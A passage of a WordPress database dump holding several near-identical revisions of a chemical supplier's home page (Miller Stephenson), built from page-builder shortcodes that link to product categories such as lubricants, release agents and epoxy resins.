link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agents, specialty coatings and unique formulations.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:42:46', '2017-05-27 09:42:46', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4300, 1, '2017-05-27 09:43:35', '2017-05-27 09:43:35', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:43:35', '2017-05-27 09:43:35', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4301, 1, '2017-05-27 09:46:41', '2017-05-27 09:46:41', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nFour fully stocked USA & Canadian locations allow us to ensure swift delivery. Huge KRYTOX selection & inventory.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:46:41', '2017-05-27 09:46:41', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4302, 1, '2017-05-27 09:48:29', '2017-05-27 09:48:29', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nFour fully stocked USA & Canadian locations allow us to ensure swift delivery. Huge KRYTOX inventory of most grades at bulk pricing.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:48:29', '2017-05-27 09:48:29', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4303, 1, '2017-05-27 09:49:11', '2017-05-27 09:49:11', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" 